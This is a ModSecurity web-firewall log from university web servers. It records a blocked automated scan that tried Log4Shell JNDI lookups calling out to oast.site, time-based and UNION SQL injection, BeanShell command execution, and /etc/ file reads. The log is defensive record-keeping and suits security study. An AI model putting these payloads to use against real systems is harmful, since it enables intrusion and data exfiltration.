[Tue Aug 29 11:30:43.304533 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPv-GUAAAAM"]
[Tue Aug 29 11:30:43.308321 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAOOuYgAAAAW"]
[Tue Aug 29 11:30:43.308679 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgz5d7zdmdowob9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOH4VwAAAAH"]
[Tue Aug 29 11:30:43.313694 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPiBh8AAAAB"]
[Tue Aug 29 11:30:43.394935 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgjzgrc31fa1udy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAOH4V0AAAAH"]
[Tue Aug 29 11:30:43.395599 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg6qdir8fqr9s7u.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPiBiAAAAAB"]
[Tue Aug 29 11:30:43.395889 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg7bdzygskkr71z.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPQkgYAAAAe"]
[Tue Aug 29 11:30:43.456994 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPRNb0AAAAf"]
[Tue Aug 29 11:30:43.502274 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgc5gy6bjx65z6o.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPv-GgAAAAM"]
[Tue Aug 29 11:30:43.583952 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10c8Co-f0AAAPXApkAAAAi"]
[Tue Aug 29 11:30:44.346807 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPyOFsAAAAR"]
[Tue Aug 29 11:30:44.381730 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgnhma8chasmrxd.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10dMCo-f0AAAPv-GwAAAAM"]
[Tue Aug 29 11:30:44.418505 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPOhaQAAAAa"]
[Tue Aug 29 11:30:44.421619 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPXApwAAAAi"]
[Tue Aug 29 11:30:44.423865 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPiBiUAAAAB"]
[Tue Aug 29 11:30:44.436654 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAO877wAAAAF"]
[Tue Aug 29 11:30:45.321100 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10dcCo-f0AAAPyOF4AAAAR"]
[Tue Aug 29 11:30:45.324885 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPmhNQAAAAV"]
[Tue Aug 29 11:30:45.344966 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPQkg4AAAAe"]
[Tue Aug 29 11:30:45.352263 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPxBTsAAAAS"]
[Tue Aug 29 11:30:45.409965 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAOM4YcAAAAU"]
[Tue Aug 29 11:30:45.421091 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPiBigAAAAB"]
[Tue Aug 29 11:30:46.324415 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPRNccAAAAf"]
[Tue Aug 29 11:30:46.357218 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dsCo-f0AAAPRNcgAAAAf"]
[Tue Aug 29 11:30:46.358436 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dsCo-f0AAAPMmDAAAAAY"]
[Tue Aug 29 11:30:46.367386 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPDn0YAAAAP"]
[Tue Aug 29 11:30:47.376015 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPOhakAAAAa"]
[Tue Aug 29 11:30:47.377252 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAOM4YsAAAAU"]
[Tue Aug 29 11:30:47.383130 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPMmDMAAAAY"]
[Tue Aug 29 11:30:47.384941 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPRNcoAAAAf"]
